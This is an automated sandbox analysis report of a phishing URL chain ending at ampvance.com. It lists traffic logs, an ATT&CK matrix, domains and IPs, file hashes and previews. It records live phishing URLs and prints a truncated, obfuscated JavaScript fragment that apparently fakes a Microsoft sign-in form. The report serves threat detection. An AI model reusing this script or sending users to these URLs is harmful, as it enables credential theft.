          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: classification engineClassification label: mal72.phis.troj.win@22/34@18/11
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6456:120:WilError_03
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1748,i,5136223978624495583,15776153539356877237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1748,i,5136223978624495583,15776153539356877237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 3.6.pages.csv, type: HTML
          Source: Yara matchFile source: 4.7.pages.csv, type: HTML
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://ampvance.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515100%Avira URL Cloudphishing
          https://ampvance.com/js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3100%Avira URL Cloudphishing
          https://ampvance.com/boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2100%Avira URL Cloudphishing
          https://ampvance.com/ASSETS/img/m_.svg100%Avira URL Cloudphishing
          https://ampvance.com/favicon.ico100%Avira URL Cloudphishing
          https://ampvance.com/APP-048a11303f2c0b13c71de5123e30fffb65e71ce053bdc/048a11303f2c0b13c71de5123e30fffb65e71ce053bde100%Avira URL Cloudphishing
          https://ampvance.com/1100%Avira URL Cloudphishing
          https://ampvance.com/x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3100%Avira URL Cloudphishing
          https://ampvance.com/ASSETS/img/sig-op.svg100%Avira URL Cloudphishing
          https://ampvance.com/o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02100%Avira URL Cloudphishing
          https://ampvance.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6b69aed817b1100%Avira URL Cloudphishing
          https://ampvance.com/jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daf100%Avira URL Cloudphishing
          https://rfpcertstream.castlehillinfotech.com/favicon.ico0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            ampvance.com
            104.21.81.229
            truefalse
              unknown
              challenges.cloudflare.com
              104.17.3.184
              truefalse
                high
                www.google.com
                142.250.80.36
                truefalse
                  high
                  rfpcertstream.castlehillinfotech.com
                  172.105.184.142
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.211.108
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://ampvance.com/boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2false
                      • Avira URL Cloud: phishing
                      unknown
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=85fa6b76cf6e4369false
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/85fa6b76cf6e4369/1709644999741/0fb3a646aa0a887b61a44db8eafd773faaff7031b3776205cabb903351463218/dAp7jUY1dzXr_Hsfalse
                          high
                          https://a.nel.cloudflare.com/report/v3?s=2mf8xaZkZKjsOfK2ulW9AE0aKQkzRdwMK5ldITE2N8XTB%2B8k6mGqsrrXokklGBcNnJuj7OvyIwrXYnnE1bym%2BknWxe8bCFnop4KTmyGoeor7PN6XWVfJac2XwwSOapY%3Dfalse
                            high
                            https://ampvance.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515false
                            • Avira URL Cloud: phishing
                            unknown
                            https://ampvance.com/x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3false
                            • Avira URL Cloud: phishing
                            unknown
                            https://a.nel.cloudflare.com/report/v3?s=FpEbiIHEf6wt5KG8Z0z4k1xf4epHPXC5mSFiPc4k1oUlL4POmSpFgDij1iWqzJUKGexD7YWkJdjUDwIllWYM1JNOPHLGt4%2Be9EvT66KZ3Acp88ep1nGgykICUjzL5MY%3Dfalse
                              high
                              https://ampvance.com/ASSETS/img/m_.svgfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://ampvance.com/APP-048a11303f2c0b13c71de5123e30fffb65e71ce053bdc/048a11303f2c0b13c71de5123e30fffb65e71ce053bdefalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f#true
                                unknown
                                https://ampvance.com/1false
                                • Avira URL Cloud: phishing
                                unknown
                                https://ampvance.com/favicon.icofalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://ampvance.com/o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02false
                                • Avira URL Cloud: phishing
                                unknown
                                https://ampvance.com/js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3false
                                • Avira URL Cloud: phishing
                                unknown
                                https://ampvance.com/ASSETS/img/sig-op.svgfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93ftrue
                                  unknown
                                  https://a.nel.cloudflare.com/report/v3?s=IdFJ5LZkMBtOW%2FfH6s%2F%2FZ9lYpBY1G6PVox3eSqqntFlggZ0XGv8Wds0yg9FOcGdnG8tYwGy96VKfs9SapgfVtbBlrYrviU9M%2Fk5yif54isJVh3ZgyjjbYfEjHo6QnoI%3Dfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                      high
                                      https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/false
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalfalse
                                          high
                                          https://rfpcertstream.castlehillinfotech.com/favicon.icofalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ampvance.com/false
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/85fa6b76cf6e4369/1709644999735/5XCbngvQK7ffH2mfalse
                                                high
                                                https://ampvance.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6b69aed817b1false
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://ampvance.com/jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daffalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://getbootstrap.com/)chromecache_52.2.drfalse
                                                  high
                                                  https://github.com/twbs/bootstrap/graphs/contributors)chromecache_52.2.drfalse
                                                    high
                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_52.2.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.80.36
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      104.21.81.229
                                                      ampvance.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      172.67.165.105
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.17.3.184
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      35.190.80.1
                                                      a.nel.cloudflare.comUnited States
                                                      15169GOOGLEUSfalse
                                                      172.105.184.142
                                                      rfpcertstream.castlehillinfotech.comUnited States
                                                      63949LINODE-APLinodeLLCUSfalse
                                                      104.17.2.184
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      IP
                                                      192.168.2.4
                                                      192.168.2.6
                                                      192.168.2.5
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1403432
                                                      Start date and time:2024-03-05 14:22:19 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal72.phis.troj.win@22/34@18/11
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.72.99, 172.253.115.84, 142.251.41.14, 34.104.35.123, 13.85.23.86, 104.117.182.81, 104.117.182.18, 104.117.182.73, 104.117.182.82, 192.229.211.108, 20.166.126.56, 52.165.164.15, 142.250.81.234, 142.251.41.10, 142.250.65.170, 142.250.80.10, 142.251.40.170, 142.251.40.106, 142.250.80.42, 142.251.32.106, 142.251.35.170, 142.250.65.234, 142.251.40.138, 142.250.65.202, 142.250.64.106, 142.250.72.106, 172.217.165.138, 142.251.40.234, 52.165.165.26, 142.251.32.99, 20.114.59.183
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • VT rate limit hit for: https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7043), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):7043
                                                      Entropy (8bit):5.2804407743048944
                                                      Encrypted:false
                                                      SSDEEP:192:wtIrjU2y/QZN5uvVRQ+tslFqEMkewx+No91m8mq9Ana1opn:wKXU2y/QZN5uvVyFq7kew0xLa1Y
                                                      MD5:B6C202188699B897BB727A68EDD24665
                                                      SHA1:FF3B891E06C983DCA277C1D7D874C8EB8084EB96
                                                      SHA-256:184A034CB9202937BF012AFF8C81E0747B7CA8F8F9E6115556FDB09D5BAEC419
                                                      SHA-512:AD8D243B156841EC27CA057CF1E0F64B8802E0DF64F79000739605CDE2C9A9FA1E3E24D153AB34A7AA66F726FC701816CA116052F4129AF3FB78D8F4057EE9F8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3
                                                      Preview:var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(_0x18f255,_0x432ca9){var _0xb8cc2=_0xe936,_0x553352=_0x18f255();while(!![]){try{var _0x1c3eea=-parseInt(_0xb8cc2(0x161))/0x1+-parseInt(_0xb8cc2(0x132))/0x2+parseInt(_0xb8cc2(0x154))/0x3+-parseInt(_0xb8cc2(0x16c))/0x4+parseInt(_0xb8cc2(0x12e))/0x5+parseInt(_0xb8cc2(0x174))/0x6+-parseInt(_0xb8cc2(0x136))/0x7;if(_0x1c3eea===_0x432ca9)break;else _0x553352['push'](_0x553352['shift']());}catch(_0x104ec1){_0x553352['push'](_0x553352['shift']());}}}(_0x2e89,0x62b01));function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset','log_form','now','redirect','reload','.light
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 52 x 83, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770306
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPl5st/iJ6hkxl/k4E08up:6v/lhPotw6hk7Tp
                                                      MD5:2F868838C02A026BF15A736C1C664340
                                                      SHA1:389C026BA12C204A57EB7F92DE03D23AB961C47A
                                                      SHA-256:366526B829B2378B458E5D15841F08A30C8992D1FA78C674087098B8D6E03FFC
                                                      SHA-512:6D9E6A67DF60860685B6E45CE1F532B4E10DAC79F513EB73FD0B38728BAE1762FEFB7C800A50271C6AEA4C184553104850E2D0CBB677C1A9834B2C9265E2A745
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...4...S....._.^....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (39034)
                                                      Category:downloaded
                                                      Size (bytes):39035
                                                      Entropy (8bit):5.376015994898
                                                      Encrypted:false
                                                      SSDEEP:768:0CFtCHnWW/i+s3hPbBL3eDTeJwKNgQOYfGM10/38nZC5XZzz8FkNcX8xKJ:oHnWai+s3hPbd3eDTeJFgQl11WQ
                                                      MD5:2C6914D08E921FD932A0BE1BE0E1CF4F
                                                      SHA1:7621BC83E401BB8675F5783F31E13816791BD37B
                                                      SHA-256:F2D1C49F53AD2BEDBB54B6AD29F17EA493D7DA967F7487C7DD1493FFA7CD5BCC
                                                      SHA-512:E4814AC33CF6C8E3398E83236ACFA731BA06168FA13F33E3A11F0CDEBB7BBAFF01085FE581AAC3718A46C4EC29D04CBCA6ED7FCF41CFA4131F6C8AEC46A15A16
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/a0d8959cb7d0/api.js?onload=lDtWXt4&render=explicit
                                                      Preview:"use strict";(function(){function pt(e,r,t,i,f,s,g){try{var v=e[s](g),y=v.value}catch(u){t(u);return}v.done?r(y):Promise.resolve(y).then(i,f)}function vt(e){return function(){var r=this,t=arguments;return new Promise(function(i,f){var s=e.apply(r,t);function g(y){pt(s,i,f,g,v,"next",y)}function v(y){pt(s,i,f,g,v,"throw",y)}g(void 0)})}}function k(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):k(e,r)}function xe(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ue(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},i=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(i=i.concat(Object.getOwnPropertySymbols(t).filter(function(f){return Object.getOwnPropertyDescriptor(t,f).enumerable}))),i.forEach(function(f){xe(e,f,t[f])})}return e}function mt(e){if(Array.isArray(e))return e}function gt(e,r){var t=e==null?null:typeof Symbol!="und
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (50758)
                                                      Category:downloaded
                                                      Size (bytes):51039
                                                      Entropy (8bit):5.247253437401007
                                                      Encrypted:false
                                                      SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                      MD5:67176C242E1BDC20603C878DEE836DF3
                                                      SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                      SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                      SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2
                                                      Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:downloaded
                                                      Size (bytes):283
                                                      Entropy (8bit):5.129401547760382
                                                      Encrypted:false
                                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRVYxQ3RJ2uNBFm8oD:J0+oxBeRmR9etdzRxGezHL/RJq8+
                                                      MD5:7F262C95E501BF3E3DA3BA18429C25F0
